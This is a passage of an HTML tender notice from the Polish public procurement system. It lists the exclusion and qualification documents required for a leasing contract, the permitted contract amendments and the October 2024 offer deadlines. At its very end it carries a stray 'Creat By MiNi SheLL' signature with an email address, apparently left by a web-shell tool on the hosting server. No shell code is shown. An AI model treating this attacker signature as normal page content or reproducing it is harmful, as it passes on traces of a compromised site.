stanowiącą przedmiot zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykazu dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy, wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, o ile nie wynika ono z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (jeżeli dotyczy);<br/>b)	kalkulację ceny oferty<br/>c)	zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, o którym mowa w art. 118 ust. 3 ustawy Pzp (jeśli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy (lider konsorcjum).<br/>Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich Wykonawców składających ofertę wspólną.<br/>Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. Do oferty należy załączyć:<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy, wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, o ile nie wynika ono z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru; oświadczenie o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony są uprawnione do dokonania zmiany umowy w zakresie:<br/>1) przedmiotu leasingu w przypadku:<br/>a) konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych ze względu na zmiany obowiązującego prawa;<br/>b) możliwości zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych, jeżeli pojawią się nowsze rozwiązania w stosunku do zawartych w opisie przedmiotu zamówienia;<br/>2) terminu dostarczenia przedmiotu leasingu w przypadku:<br/>a) jeżeli wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;<br/>b) jeżeli wystąpi siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z jej postanowieniami;<br/>3) wysokości wynagrodzenia Wykonawcy w przypadku zmiany:<br/>a) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę;<br/>e) ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>20. Wszelkie zmiany umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu do umowy, pod rygorem nieważności.<br/>Szczegółowe warunki dokonywania zmian umowy, z uwagi na ich obszerność, zawarte będą w dokumentach zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-86bb4937-25aa-4b3f-ad8f-89037ab5f6cb</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-15 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com